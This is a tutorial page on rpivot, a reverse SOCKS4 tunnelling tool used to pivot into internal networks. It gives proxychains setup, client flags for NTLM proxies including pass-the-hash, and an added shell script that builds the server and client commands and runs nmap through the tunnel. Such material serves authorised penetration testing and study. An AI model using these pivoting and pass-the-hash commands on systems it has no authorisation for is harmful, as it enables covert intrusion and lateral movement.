Rpivot
RPIVOT allows tunnelling traffic into an internal network via SOCKS4. It works like SSH dynamic port forwarding but in the opposite direction: the SOCKS4 proxy opens on the rpivot server (the attacker's machine), and the rpivot client running on the pivot host connects back to that server and relays the proxied connections into the internal network.
Source: https://github.com/klsecservices/rpivot
Requirements
Python 2.6/2.7
Add this line to the /etc/proxychains.conf file on the machine that runs the rpivot server (that is where the SOCKS4 proxy opens):
socks4 127.0.0.1 1080
When to use rpivot?
Imagine this scenario:

Machine A can connect to B
Machine B can connect to C
C can't connect directly to A
So, in this case, we run the rpivot server on A and the rpivot client on B. The client connects back to the server port on A (B must therefore be able to reach that port), and the SOCKS4 proxy opens on A.
After that, we can access C from A through proxychains: the traffic enters the SOCKS4 port on A, travels down the tunnel to B, and B connects to C on our behalf.
In Wireshark we can see that all the communication between A and B went through port 4444, the server port we chose when starting rpivot; C only sees connections coming from B.

We can also pivot through an NTLM proxy. If B can only reach A through an authenticating HTTP proxy, the rpivot client tunnels its connection to the server through that proxy.
In this case, we add these flags to the client command on B:
--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --password password
Or using pass the hash:
--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --hashes <hash>
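As an added example (not code from the rpivot project or from this page), the following POSIX shell script wraps the A/B/C procedure above and the NTLM proxy flags into a few functions, so the same port numbers are used on both ends and the pass-the-hash argument is checked before it is sent. Assumptions: rpivot is checked out at $RPIVOT_DIR on both A and B, the client on B connects back to A on port 4444 (the port seen in the Wireshark capture), the SOCKS4 proxy opens on 127.0.0.1:1080 as in the proxychains.conf line above, and the value passed to --hashes is an LMHASH:NTHASH pair (two 32-digit hex strings), which should be checked against the rpivot README before use.

```shell
#!/bin/sh
# Added example; not code from the rpivot project or the original page.
# Wraps the A -> B -> C pivot described above. Assumptions: rpivot is checked
# out at $RPIVOT_DIR on both A and B, B's client connects back to A on port
# 4444 (the port seen in the Wireshark capture), and the SOCKS4 proxy opens
# on 127.0.0.1:1080, matching the proxychains.conf line above.
RPIVOT_DIR="${RPIVOT_DIR:-/opt/rpivot}"
SERVER_PORT="${SERVER_PORT:-4444}"
SOCKS_PORT="${SOCKS_PORT:-1080}"

# Step 1, on A (the attacker box): the server waits for B's client on
# $SERVER_PORT and opens the SOCKS4 proxy on $SOCKS_PORT. Only flags from
# the rpivot README are used (--server-ip, --server-port, --proxy-port).
rpivot_server_cmd() {
    printf 'python2 %s/server.py --server-ip 0.0.0.0 --server-port %s --proxy-port %s\n' \
        "$RPIVOT_DIR" "$SERVER_PORT" "$SOCKS_PORT"
}

# Step 2, on B (the pivot): the client connects back to A.
#   rpivot_client_cmd A_IP
#   rpivot_client_cmd A_IP PROXY_IP PROXY_PORT DOMAIN USER password SECRET
#   rpivot_client_cmd A_IP PROXY_IP PROXY_PORT DOMAIN USER hashes LM:NT
# The second and third forms go out through an authenticating NTLM proxy
# using the flags listed on the page. For pass the hash the secret is
# assumed to be LMHASH:NTHASH (two 32-digit hex strings) and is validated.
rpivot_client_cmd() {
    cmd="python2 $RPIVOT_DIR/client.py --server-ip $1 --server-port $SERVER_PORT"
    if [ "$#" -ge 7 ]; then
        cmd="$cmd --ntlm-proxy-ip $2 --ntlm-proxy-port $3 --domain $4 --username $5"
        case "$6" in
            password)
                cmd="$cmd --password $7" ;;
            hashes)
                if ! printf '%s\n' "$7" | grep -Eq '^[0-9a-fA-F]{32}:[0-9a-fA-F]{32}$'; then
                    echo "rpivot_client_cmd: hashes must be LMHASH:NTHASH" >&2
                    return 1
                fi
                cmd="$cmd --hashes $7" ;;
            *)
                echo "rpivot_client_cmd: auth mode must be 'password' or 'hashes'" >&2
                return 1 ;;
        esac
    elif [ "$#" -ne 1 ]; then
        echo "rpivot_client_cmd: give A_IP alone, or A_IP plus the six NTLM proxy arguments" >&2
        return 1
    fi
    # The secret ends up in B's process list either way; prefer --hashes over
    # a cleartext password when the account matters.
    printf '%s\n' "$cmd"
}

# Step 3, on A: make sure proxychains points at the SOCKS4 port, without
# duplicating the line on repeated runs. $1 is the config file
# (default /etc/proxychains.conf).
ensure_proxychains_socks4() {
    conf="${1:-/etc/proxychains.conf}"
    line="socks4 127.0.0.1 $SOCKS_PORT"
    grep -qx "$line" "$conf" 2>/dev/null || printf '%s\n' "$line" >> "$conf"
}

# Step 4, on A: run a tool against C through the tunnel, e.g.
#   pivot_exec nmap -sT -Pn -p 22,80,445 <C_ip>
# -sT is needed: SOCKS only carries full TCP connections, so SYN scans,
# ICMP pings and UDP are not tunnelled.
pivot_exec() {
    proxychains "$@"
}

# Stand-alone usage: `sh pivot.sh show` prints the commands for a sample
# layout (A = 10.0.0.1, NTLM proxy = 192.168.1.5:8080); nothing is executed.
if [ "${1:-}" = "show" ]; then
    rpivot_server_cmd
    rpivot_client_cmd 10.0.0.1 192.168.1.5 8080 DOMAIN.COM John password 'Passw0rd!'
fi
```

The functions only build the command lines; copy the server line to A and the client line to B, then run your tooling on A through pivot_exec. The hash check exists because a malformed --hashes value fails only at the proxy on B, which is the one place you do not want to debug blind.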